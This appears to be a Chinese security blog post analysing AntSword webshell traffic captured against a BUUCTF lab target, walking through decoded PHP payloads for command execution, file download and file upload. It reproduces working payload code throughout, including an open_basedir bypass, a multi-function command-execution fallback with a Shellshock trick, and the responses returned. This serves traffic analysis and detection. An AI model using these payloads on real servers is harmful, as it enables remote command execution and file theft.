蚁剑流量分析
默认编码
测试链接
请求数据包
POST /upload/ph.php HTTP/1.1
Host: bb2bcf4f-5508-49dd-a50a-2b8d2a925a86.node5.buuoj.cn:81
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 1785
Connection: keep-alive
a=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3B%24opdir%3D%40ini_get(%22open_basedir%22)%3Bif(%24opdir)%20%7B%24ocwd%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3B%24oparr%3Dpreg_split(base64_decode(%22Lzt8Oi8%3D%22)%2C%24opdir)%3B%40array_push(%24oparr%2C%24ocwd%2Csys_get_temp_dir())%3Bforeach(%24oparr%20as%20%24item)%20%7Bif(!%40is_writable(%24item))%7Bcontinue%3B%7D%3B%24tmdir%3D%24item.%22%2F.aa92ba732e%22%3B%40mkdir(%24tmdir)%3Bif(!%40file_exists(%24tmdir))%7Bcontinue%3B%7D%24tmdir%3Drealpath(%24tmdir)%3B%40chdir(%24tmdir)%3B%40ini_set(%22open_basedir%22%2C%20%22..%22)%3B%24cntarr%3D%40preg_split(%22%2F%5C%5C%5C%5C%7C%5C%2F%2F%22%2C%24tmdir)%3Bfor(%24i%3D0%3B%24i%3Csizeof(%24cntarr)%3B%24i%2B%2B)%7B%40chdir(%22..%22)%3B%7D%3B%40ini_set(%22open_basedir%22%2C%22%2F%22)%3B%40rmdir(%24tmdir)%3Bbreak%3B%7D%3B%7D%3B%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%220bf%22.%22295%22%3Becho%20%40asenc(%24output)%3Becho%20%2228%22.%22686%22%3B%7Dob_start()%3Btry%7B%24D%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3Bif(%24D%3D%3D%22%22)%24D%3Ddirname(%24_SERVER%5B%22PATH_TRANSLATED%22%5D)%3B%24R%3D%22%7B%24D%7D%09%22%3Bif(substr(%24D%2C0%2C1)!%3D%22%2F%22)%7Bforeach(range(%22C%22%2C%22Z%22)as%20%24L)if(is_dir(%22%7B%24L%7D%3A%22))%24R.%3D%22%7B%24L%7D%3A%22%3B%7Delse%7B%24R.%3D%22%2F%22%3B%7D%24R.%3D%22%09%22%3B%24u%3D(function_exists(%22posix_getegid%22))%3F%40posix_getpwuid(%40posix_geteuid())%3A%22%22%3B%24s%3D(%24u)%3F%24u%5B%22name%22%5D%3A%40get_current_user()%3B%24R.%3Dphp_uname()%3B%24R.%3D%22%09%7B%24s%7D%22%3Becho%20%24R%3B%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B
请求数据
a=@ini_set("display_errors", "0");
@set_time_limit(0);
$opdir=@ini_get("open_basedir");
if($opdir) {
$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);
$oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);
@array_push($oparr,$ocwd,sys_get_temp_dir());
foreach($oparr as $item) {
if(!@is_writable($item)) {
continue;
}
;
$tmdir=$item."/.aa92ba732e";
@mkdir($tmdir);
if(!@file_exists($tmdir)) {
continue;
}
$tmdir=realpath($tmdir);
@chdir($tmdir);
@ini_set("open_basedir", "..");
$cntarr=@preg_split("/\\|//",$tmdir);
for ($i=0;$i<sizeof($cntarr);$i++) {
@chdir("..");
}
;
@ini_set("open_basedir","/");
@rmdir($tmdir);
break;
}
;
}
;
;
function asenc($out) {
return$out;
}
;
functionasoutput() {
$output=ob_get_contents();
ob_end_clean();
echo"0bf"."295";
echo @asenc($output);
echo"28"."686";
}
ob_start();
try {
$D=dirname($_SERVER["SCRIPT_FILENAME"]);
if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);
$R="{$D} ";
if(substr($D,0,1)!="/") {
foreach(range("C","Z")as $L)if(is_dir("{$L}:"))$R.="{$L}:";
} else {
$R.="/";
}
$R.=" ";
$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";
$s=($u)?$u["name"]:@get_current_user();
$R.=php_uname();
$R.=" {$s}";
echo$R;
;
}
catch(Exception $e) {
echo"ERROR://".$e->getMessage();
}
;
asoutput();
die();
a,表示 webshell 的链接密码。
@ini_set("display_errors", "0");,表示禁止显示 PHP 错误信息。
@set_time_limit(0);,脚本执行的时间不受限制。
输出函数
functionasoutput() {
$output=ob_get_contents();
ob_end_clean();
echo"0bf"."295";
echo @asenc($output);
echo"28"."686";
}
返回参数
0bf295
/var/www/html/upload/
Linux out 5.15.0-119-generic #129-Ubuntu SMP Fri Aug 2 19:25:20 UTC 2024 x86_64 www-data
28686
命令执行请求包
POST /upload/ph.php HTTP/1.1
Host: bb2bcf4f-5508-49dd-a50a-2b8d2a925a86.node5.buuoj.cn:81
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 4909
Connection: keep-alive
a=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3B%24opdir%3D%40ini_get(%22open_basedir%22)%3Bif(%24opdir)%20%7B%24ocwd%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3B%24oparr%3Dpreg_split(base64_decode(%22Lzt8Oi8%3D%22)%2C%24opdir)%3B%40array_push(%24oparr%2C%24ocwd%2Csys_get_temp_dir())%3Bforeach(%24oparr%20as%20%24item)%20%7Bif(!%40is_writable(%24item))%7Bcontinue%3B%7D%3B%24tmdir%3D%24item.%22%2F.8fd860a%22%3B%40mkdir(%24tmdir)%3Bif(!%40file_exists(%24tmdir))%7Bcontinue%3B%7D%24tmdir%3Drealpath(%24tmdir)%3B%40chdir(%24tmdir)%3B%40ini_set(%22open_basedir%22%2C%20%22..%22)%3B%24cntarr%3D%40preg_split(%22%2F%5C%5C%5C%5C%7C%5C%2F%2F%22%2C%24tmdir)%3Bfor(%24i%3D0%3B%24i%3Csizeof(%24cntarr)%3B%24i%2B%2B)%7B%40chdir(%22..%22)%3B%7D%3B%40ini_set(%22open_basedir%22%2C%22%2F%22)%3B%40rmdir(%24tmdir)%3Bbreak%3B%7D%3B%7D%3B%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%22687%22.%222a9%22%3Becho%20%40asenc(%24output)%3Becho%20%2223%22.%2258b%22%3B%7Dob_start()%3Btry%7B%24p%3Dbase64_decode(substr(%24_POST%5B%22kb78d3bfb243d8%22%5D%2C2))%3B%24s%3Dbase64_decode(substr(%24_POST%5B%22h21304b547e841%22%5D%2C2))%3B%24envstr%3D%40base64_decode(substr(%24_POST%5B%22z18fc7fc8837b7%22%5D%2C2))%3B%24d%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3B%24c%3Dsubstr(%24d%2C0%2C1)%3D%3D%22%2F%22%3F%22-c%20%5C%22%7B%24s%7D%5C%22%22%3A%22%2Fc%20%5C%22%7B%24s%7D%5C%22%22%3Bif(substr(%24d%2C0%2C1)%3D%3D%22%2F%22)%7B%40putenv(%22PATH%3D%22.getenv(%22PATH%22).%22%3A%2Fusr%2Flocal%2Fsbin%3A%2Fusr%2Flocal%2Fbin%3A%2Fusr%2Fsbin%3A%2Fusr%2Fbin%3A%2Fsbin%3A%2Fbin%22)%3B%7Delse%7B%40putenv(%22PATH%3D%22.getenv(%22PATH%22).%22%3BC%3A%2FWindows%2Fsystem32%3BC%3A%2FWindows%2FSysWOW64%3BC%3A%2FWindows%3BC%3A%2FWindows%2FSystem32%2FWindowsPowerShell%2Fv1.0%2F%3B%22)%3B%7Dif(!empty(%24envstr))%7B%24envarr%3Dexplode(%22%7C%7C%7Casline%7C%7C%7C%22%2C%20%24envstr)%3Bforeach(%24envarr%20as%20%24v)%20%7Bif%20(!empty(%24v))%20%7B%40putenv(str_replace(%22%7C%7C%7Caskey%7C%7C%7C%22%2C%20%22%3D%22%2C%20%24v))%3B%7D%7D%7D%24r%3D%22%7B%24p%7D%20%7B%24c%7D%22%3Bfunction%20fe(%24f)%7B%24d%3Dexplode(%22%2C%22%2C%40ini_get(%22disable_functions%22))%3Bif(empty(%24d))%7B%24d%3Darray()%3B%7Delse%7B%24d%3Darray_map('trim'%2Carray_map('strtolower'%2C%24d))%3B%7Dreturn(function_exists(%24f)%26%26is_callable(%24f)%26%26!in_array(%24f%2C%24d))%3B%7D%3Bfunction%20runshellshock(%24d%2C%20%24c)%20%7Bif%20(substr(%24d%2C%200%2C%201)%20%3D%3D%20%22%2F%22%20%26%26%20fe('putenv')%20%26%26%20(fe('error_log')%20%7C%7C%20fe('mail')))%20%7Bif%20(strstr(readlink(%22%2Fbin%2Fsh%22)%2C%20%22bash%22)%20!%3D%20FALSE)%20%7B%24tmp%20%3D%20tempnam(sys_get_temp_dir()%2C%20'as')%3Bputenv(%22PHP_LOL%3D()%20%7B%20x%3B%20%7D%3B%20%24c%20%3E%24tmp%202%3E%261%22)%3Bif%20(fe('error_log'))%20%7Berror_log(%22a%22%2C%201)%3B%7D%20else%20%7Bmail(%22a%40127.0.0.1%22%2C%20%22%22%2C%20%22%22%2C%20%22-bv%22)%3B%7D%7D%20else%20%7Breturn%20False%3B%7D%24output%20%3D%20%40file_get_contents(%24tmp)%3B%40unlink(%24tmp)%3Bif%20(%24output%20!%3D%20%22%22)%20%7Bprint(%24output)%3Breturn%20True%3B%7D%7Dreturn%20False%3B%7D%3Bfunction%20runcmd(%24c)%7B%24ret%3D0%3B%24d%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3Bif(fe('system'))%7B%40system(%24c%2C%24ret)%3B%7Delseif(fe('passthru'))%7B%40passthru(%24c%2C%24ret)%3B%7Delseif(fe('shell_exec'))%7Bprint(%40shell_exec(%24c))%3B%7Delseif(fe('exec'))%7B%40exec(%24c%2C%24o%2C%24ret)%3Bprint(join(%22%0A%22%2C%24o))%3B%7Delseif(fe('popen'))%7B%24fp%3D%40popen(%24c%2C'r')%3Bwhile(!%40feof(%24fp))%7Bprint(%40fgets(%24fp%2C2048))%3B%7D%40pclose(%24fp)%3B%7Delseif(fe('proc_open'))%7B%24p%20%3D%20%40proc_open(%24c%2C%20array(1%20%3D%3E%20array('pipe'%2C%20'w')%2C%202%20%3D%3E%20array('pipe'%2C%20'w'))%2C%20%24io)%3Bwhile(!%40feof(%24io%5B1%5D))%7Bprint(%40fgets(%24io%5B1%5D%2C2048))%3B%7Dwhile(!%40feof(%24io%5B2%5D))%7Bprint(%40fgets(%24io%5B2%5D%2C2048))%3B%7D%40fclose(%24io%5B1%5D)%3B%40fclose(%24io%5B2%5D)%3B%40proc_close(%24p)%3B%7Delseif(fe('antsystem'))%7B%40antsystem(%24c)%3B%7Delseif(runshellshock(%24d%2C%20%24c))%20%7Breturn%20%24ret%3B%7Delseif(substr(%24d%2C0%2C1)!%3D%22%2F%22%20%26%26%20%40class_exists(%22COM%22))%7B%24w%3Dnew%20COM('WScript.shell')%3B%24e%3D%24w-%3Eexec(%24c)%3B%24so%3D%24e-%3EStdOut()%3B%24ret.%3D%24so-%3EReadAll()%3B%24se%3D%24e-%3EStdErr()%3B%24ret.%3D%24se-%3EReadAll()%3Bprint(%24ret)%3B%7Delse%7B%24ret%20%3D%20127%3B%7Dreturn%20%24ret%3B%7D%3B%24ret%3D%40runcmd(%24r.%22%202%3E%261%22)%3Bprint%20(%24ret!%3D0)%3F%22ret%3D%7B%24ret%7D%22%3A%22%22%3B%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B&h21304b547e841=vXY2QgIi92YXIvd3d3L2h0bWwvdnVsL3Vuc2FmZXVwbG9hZC91cGxvYWRzIjt3aG9hbWk7ZWNobyA4NmNlZjgzNTRkMTtwd2Q7ZWNobyA1NzhkMWRhZjEx&kb78d3bfb243d8=gUL2Jpbi9zaA%3D%3D&z18fc7fc8837b7=4S
请求包存在三个参数
a=@ini_set("display_errors", "0");
@set_time_limit(0);
$opdir=@ini_get("open_basedir");
if($opdir) {
$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);
$oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);
@array_push($oparr,$ocwd,sys_get_temp_dir());
foreach($oparr as $item) {
if(!@is_writable($item)) {
continue;
}
;
$tmdir=$item."/.8fd860a";
@mkdir($tmdir);
if(!@file_exists($tmdir)) {
continue;
}
$tmdir=realpath($tmdir);
@chdir($tmdir);
@ini_set("open_basedir", "..");
$cntarr=@preg_split("/\\|//",$tmdir);
for ($i=0;$i<sizeof($cntarr);$i++) {
@chdir("..");
}
;
@ini_set("open_basedir","/");
@rmdir($tmdir);
break;
}
;
}
;
;
function asenc($out) {
return$out;
}
;
functionasoutput() {
$output=ob_get_contents();
ob_end_clean();
echo"687"."2a9";
echo @asenc($output);
echo"23"."58b";
}
ob_start();
try {
$p=base64_decode(substr($_POST["kb78d3bfb243d8"],2));
$s=base64_decode(substr($_POST["h21304b547e841"],2));
$envstr=@base64_decode(substr($_POST["z18fc7fc8837b7"],2));
$d=dirname($_SERVER["SCRIPT_FILENAME"]);
$c=substr($d,0,1)=="/"?"-c "{$s}"":"/c "{$s}"";
if(substr($d,0,1)=="/") {
@putenv("PATH=".getenv("PATH").":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin");
} else {
@putenv("PATH=".getenv("PATH").";C:/Windows/system32;C:/Windows/SysWOW64;C:/Windows;C:/Windows/System32/WindowsPowerShell/v1.0/;");
}
if(!empty($envstr)) {
$envarr=explode("|||asline|||", $envstr);
foreach($envarr as $v) {
if (!empty($v)) {
@putenv(str_replace("|||askey|||", "=", $v));
}
}
}
$r="{$p} {$c}";
function fe($f) {
$d=explode(",",@ini_get("disable_functions"));
if(empty($d)) {
$d=array();
} else {
$d=array_map('trim',array_map('strtolower',$d));
}
return(function_exists($f)&&is_callable($f)&&!in_array($f,$d));
}
;
function runshellshock($d, $c) {
if (substr($d, 0, 1) == "/" && fe('putenv') && (fe('error_log') || fe('mail'))) {
if (strstr(readlink("/bin/sh"), "bash") != FALSE) {
$tmp = tempnam(sys_get_temp_dir(), 'as');
putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1");
if (fe('error_log')) {
error_log("a", 1);
} else {
mail("[email protected]", "", "", "-bv");
}
} else {
return False;
}
$output = @file_get_contents($tmp);
@unlink($tmp);
if ($output != "") {
print($output);
return True;
}
}
return False;
}
;
function runcmd($c) {
$ret=0;
$d=dirname($_SERVER["SCRIPT_FILENAME"]);
if(fe('system')) {
@system($c,$ret);
} elseif(fe('passthru')) {
@passthru($c,$ret);
} elseif(fe('shell_exec')) {
print(@shell_exec($c));
} elseif(fe('exec')) {
@exec($c,$o,$ret);
print(join("
",$o));
} elseif(fe('popen')) {
$fp=@popen($c,'r');
while(!@feof($fp)) {
print(@fgets($fp,2048));
}
@pclose($fp);
} elseif(fe('proc_open')) {
$p = @proc_open($c, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
while(!@feof($io[1])) {
print(@fgets($io[1],2048));
}
while(!@feof($io[2])) {
print(@fgets($io[2],2048));
}
@fclose($io[1]);
@fclose($io[2]);
@proc_close($p);
} elseif(fe('antsystem')) {
@antsystem($c);
} elseif(runshellshock($d, $c)) {
return$ret;
} elseif(substr($d,0,1)!="/" && @class_exists("COM")) {
$w=new COM('WScript.shell');
$e=$w->exec($c);
$so=$e->StdOut();
$ret.=$so->ReadAll();
$se=$e->StdErr();
$ret.=$se->ReadAll();
print($ret);
} else {
$ret = 127;
}
return$ret;
}
;
$ret=@runcmd($r." 2>&1");
print ($ret!=0)?"ret={$ret}":"";
;
}
catch(Exception $e) {
echo"ERROR://".$e->getMessage();
}
;
asoutput();
die();
h21304b547e841=vXY2QgIi92YXIvd3d3L2h0bWwvdnVsL3Vuc2FmZXVwbG9hZC91cGxvYWRzIjt3aG9hbWk7ZWNobyA4NmNlZjgzNTRkMTtwd2Q7ZWNobyA1NzhkMWRhZjEx
kb78d3bfb243d8=gUL2Jpbi9zaA==
z18fc7fc8837b7=4S
参数名1:h21304b547e841
参数名2:kb78d3bfb243d8
参数名3:z18fc7fc8837b7
两个输出函数
function asenc($out) {
return$out;
}
;
functionasoutput() {
$output=ob_get_contents();
ob_end_clean();
echo"687"."2a9";
echo @asenc($output);
echo"23"."58b";
}
处理请求参数,通过字符串截取函数获取参数第二个字符之后的数据,然后进行 base64 解密。
$p=base64_decode(substr($_POST["kb78d3bfb243d8"],2));
$s=base64_decode(substr($_POST["h21304b547e841"],2));
解密前:
h21304b547e841=vXY2QgIi92YXIvd3d3L2h0bWwvdnVsL3Vuc2FmZXVwbG9hZC91cGxvYWRzIjt3aG9hbWk7ZWNobyA4NmNlZjgzNTRkMTtwd2Q7ZWNobyA1NzhkMWRhZjEx
解密后:
h21304b547e841=cd"/var/www/html/vul/unsafeupload/uploads";whoami;echo 86cef8354d1;pwd;echo 578d1daf11
解密前:
kb78d3bfb243d8=gUL2Jpbi9zaA==
解密后:
kb78d3bfb243d8=/bin/sh
base64 解密参数值后,针对两个参数值进行处理。
$c=substr($d,0,1)=="/"?"-c "{$s}"":"/c "{$s}"";
$r="{$p} {$c}";
$c=/bin/sh
$p=cd"/var/www/html/vul/unsafeupload/uploads";whoami;echo 86cef8354d1;pwd;echo 578d1daf11
将 r 参数传给 runcmd 函数。
$ret=@runcmd($r." 2>&1");
runcmd 函数内部调用了多个 php 命令执行的函数。
function runcmd($c) {
$ret=0;
$d=dirname($_SERVER["SCRIPT_FILENAME"]);
if(fe('system')) {
@system($c,$ret);
} elseif(fe('passthru')) {
@passthru($c,$ret);
} elseif(fe('shell_exec')) {
print(@shell_exec($c));
} elseif(fe('exec')) {
@exec($c,$o,$ret);
print(join("
",$o));
输出函数
$output=ob_get_contents();
ob_end_clean();
echo"687"."2a9";
echo @asenc($output);
echo"23"."58b";
返回包
6872a9
/bin/sh: 1: cd: can't cd to /var/www/html/vul/unsafeupload/uploads
www-data
86cef8354d1
/var/www/html/upload
578d1daf11
2358b
下载文件请求包
请求包
a=@ini_set("display_errors", "0");
@set_time_limit(0);
$opdir=@ini_get("open_basedir");
if($opdir) {
$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);
$oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);
@array_push($oparr,$ocwd,sys_get_temp_dir());
foreach($oparr as $item) {
if(!@is_writable($item)) {
continue;
}
;
$tmdir=$item."/.b2940a35b";
@mkdir($tmdir);
if(!@file_exists($tmdir)) {
continue;
}
$tmdir=realpath($tmdir);
@chdir($tmdir);
@ini_set("open_basedir", "..");
$cntarr=@preg_split("/\\|//",$tmdir);
for ($i=0;$i<sizeof($cntarr);$i++) {
@chdir("..");
}
;
@ini_set("open_basedir","/");
@rmdir($tmdir);
break;
}
;
}
;
;
function asenc($out) {
return$out;
}
;
functionasoutput() {
$output=ob_get_contents();
ob_end_clean();
echo"e8f"."faf";
echo @asenc($output);
echo"6a"."c37";
}
ob_start();
try {
$F=base64_decode(substr(get_magic_quotes_gpc()?stripslashes($_POST["j0db5c5abab4a1"]):$_POST["j0db5c5abab4a1"],2));
$fp=@fopen($F,"r");
if(@fgetc($fp)) {
@fclose($fp);
@readfile($F);
} else {
echo("ERROR:// Can Not Read");
}
;
}
catch(Exception $e) {
echo"ERROR://".$e->getMessage();
}
;
asoutput();
die();
j0db5c5abab4a1=cIL3Zhci93d3cvaHRtbC92dWwvdW5zYWZldXBsb2FkL3VwbG9hZHMvcGgucGhw
接受参数
stripslashes:删除由 addslashes() 函数添加的反斜杠。
get_magic_quotes_gpc:magic_quotes_gpc 函数在 php 中的作用是判断解析用户提示的数据,如包括有:post、get、cookie 过来的数据增加转义字符“”,以确保这些数据不会引起程序,特别是数据库语句因为特殊字符引起的污染而出现致命的错误。
substr:截取字符串。
base64_decode:base64 解码
$F=base64_decode(substr(get_magic_quotes_gpc()?stripslashes($_POST["j0db5c5abab4a1"]):$_POST["j0db5c5abab4a1"],2));
解码之后的数据为下载文件的绝对路径
/var/www/html/vul/unsafeupload/uploads/ph.jpg
下载文件
fopen:fopen() 函数打开一个文件或 URL。
fgetc:fgetc() 函数从打开的文件中返回一个单一的字符。
readfile() 函数读取一个文件,并写入到输出缓冲。
$fp=@fopen($F,"r");
if(@fgetc($fp)) {
@fclose($fp);
@readfile($F);
} else {
echo("ERROR:// Can Not Read");
}
上传文件请求包
请求包
a=@ini_set("display_errors", "0");
@set_time_limit(0);
$opdir=@ini_get("open_basedir");
if($opdir) {
$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);
$oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);
@array_push($oparr,$ocwd,sys_get_temp_dir());
foreach($oparr as $item) {
if(!@is_writable($item)) {
continue;
}
;
$tmdir=$item."/.2c21113";
@mkdir($tmdir);
if(!@file_exists($tmdir)) {
continue;
}
$tmdir=realpath($tmdir);
@chdir($tmdir);
@ini_set("open_basedir", "..");
$cntarr=@preg_split("/\\|//",$tmdir);
for ($i=0;$i<sizeof($cntarr);$i++) {
@chdir("..");
}
;
@ini_set("open_basedir","/");
@rmdir($tmdir);
break;
}
;
}
;
;
function asenc($out) {
return$out;
}
;
functionasoutput() {
$output=ob_get_contents();
ob_end_clean();
echo"9f8384"."2a32f4";
echo @asenc($output);
echo"db8ba9"."344520";
}
ob_start();
try {
$f=base64_decode(substr($_POST["yeedbdd3ffe99"],2));
$c=$_POST["bbb651ffd32e89"];
$c=str_replace("r","",$c);
$c=str_replace("n","",$c);
$buf="";
for ($i=0;$i<strlen($c);$i+=2)$buf.=urldecode("%".substr($c,$i,2));
echo(@fwrite(fopen($f,"a"),$buf)?"1":"0");
;
}
catch(Exception $e) {
echo"ERROR://".$e->getMessage();
}
;
asoutput();
die();
bbb651ffd32e89=E2808CE2808CE2808CE2808CE2808DEFBBBFE280ACEFBBBFE2808DE280ACE2808CE2808CE2808DE280ACEFBBBFE2808DE2808DE2808DE2808DE2808DE280ACE2808DEFBBBFE2808CE2808DE2808CEFBBBFEFBBBFE2808DE280ACE2808CE2808CE2808DE2808DE2808CE280ACE280ACE2808DEFBBBFEFBBBFE2808DE2808DEFBBBFEFBBBFE280ACEFBBBFE2808DEFBBBF6E796E75637466E2808DE2808DE2808DEFBBBFE2808CE2808CE2808DE280ACE2808DE280ACEFBBBFE280ACEFBBBFE280ACE2808CE2808DE2808DE2808DE2808CEFBBBFEFBBBFE2808DE2808DE280AC7BE4BD9BE69BB0E2808DE2808DEFBBBFEFBBBFE280ACE2808DE2808DEFBBBFEFBC9AE2808CE2808CE2808CE2808CE2808DE280ACE2808DE280ACE2808CE2808CE2808CE2808CE2808DE280ACEFBBBFE2808CE5AEA4E6A2B5E999A4E79AA4E68289E5A5A2E68190E7BDB0E68980E4BE84E4BBA5E680AFE683B3E58092E586A5E9978DE59386E9BABCE8A8B6E586A5E68096E699BAE69BB0E5A4A2E8ABB3E5AEA4E88FA9E591BCE59190E5A4A2E784A1E4BFB1E4B896E586A5E69BB0E8A8B6E7A9B6E591BCE59190E8A8B6E6BB85E5A5A2E4BCBDE5A5A2E7BE85E7BCBDE8A8B6E79AA4E88BA6E5B89DE99B86E680AFE6AEBFE59190E699BAE986AFE4BE84E58092E59190E58DB3E58887E4BE9DE7BCBDE68096E58DB3E9809DE5A5A2E58092E79AA4E880B6E695B8E4BE84E4BE9DE5A4B7E2808CE2808CE2808CE2808CE2808DE280ACE2808CE2808DE2808CE2808CE2808CE2808CE2808DE280ACE2808DEFBBBFE2808CE2808CE2808CE2808CE2808DEFBBBFEFBBBFE2808D7D
yeedbdd3ffe99=KyL3Zhci93d3cvaHRtbC91cGxvYWQvZmlsZS50eHQ=
参数 yeedbdd3ffe99,base64 解密,为上传的文件名路径
yeedbdd3ffe99=KyL3Zhci93d3cvaHRtbC91cGxvYWQvZmlsZS50eHQ=
/var/www/html/upload/file.txt
参数 bbb651ffd32e89
str_replace:str_replace() 函数替换字符串中的一些字符(区分大小写)。
$c=$_POST["bbb651ffd32e89"];
$c=str_replace("r","",$c);
$c=str_replace("n","",$c);
#$c=E2808CE2808CE2808CE2808CE2808DEFBBBFE280ACEFBBBFE2808DE280ACE2808CE2808CE2808DE280ACEFBBBFE2808DE2808DE2808DE2808DE2808DE280ACE2808DEFBBBFE2808CE2808DE2808CEFBBBFEFBBBFE2808DE280ACE2808CE2808CE2808DE2808DE2808CE280ACE280ACE2808DEFBBBFEFBBBFE2808DE2808DEFBBBFEFBBBFE280ACEFBBBFE2808DEFBBBF6E796E75637466E2808DE2808DE2808DEFBBBFE2808CE2808CE2808DE280ACE2808DE280ACEFBBBFE280ACEFBBBFE280ACE2808CE2808DE2808DE2808DE2808CEFBBBFEFBBBFE2808DE2808DE280AC7BE4BD9BE69BB0E2808DE2808DEFBBBFEFBBBFE280ACE2808DE2808DEFBBBFEFBC9AE2808CE2808CE2808CE2808CE2808DE280ACE2808DE280ACE2808CE2808CE2808CE2808CE2808DE280ACEFBBBFE2808CE5AEA4E6A2B5E999A4E79AA4E68289E5A5A2E68190E7BDB0E68980E4BE84E4BBA5E680AFE683B3E58092E586A5E9978DE59386E9BABCE8A8B6E586A5E68096E699BAE69BB0E5A4A2E8ABB3E5AEA4E88FA9E591BCE59190E5A4A2E784A1E4BFB1E4B896E586A5E69BB0E8A8B6E7A9B6E591BCE59190E8A8B6E6BB85E5A5A2E4BCBDE5A5A2E7BE85E7BCBDE8A8B6E79AA4E88BA6E5B89DE99B86E680AFE6AEBFE59190E699BAE986AFE4BE84E58092E59190E58DB3E58887E4BE9DE7BCBDE68096E58DB3E9809DE5A5A2E58092E79AA4E880B6E695B8E4BE84E4BE9DE5A4B7E2808CE2808CE2808CE2808CE2808DE280ACE2808CE2808DE2808CE2808CE2808CE2808CE2808DE280ACE2808DEFBBBFE2808CE2808CE2808CE2808CE2808DEFBBBFEFBBBFE2808D7D
$buf="";
for ($i=0;$i<strlen($c);$i+=2)
$buf.=urldecode("%".substr($c,$i,2));
# $buf 为文件内容,
# $f=/var/www/html/upload/file.txt
echo(@fwrite(fopen($f,"a"),$buf)?"1":"0");
原文始发于微信公众号(0xh4ck3r):蚁剑流量分析
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论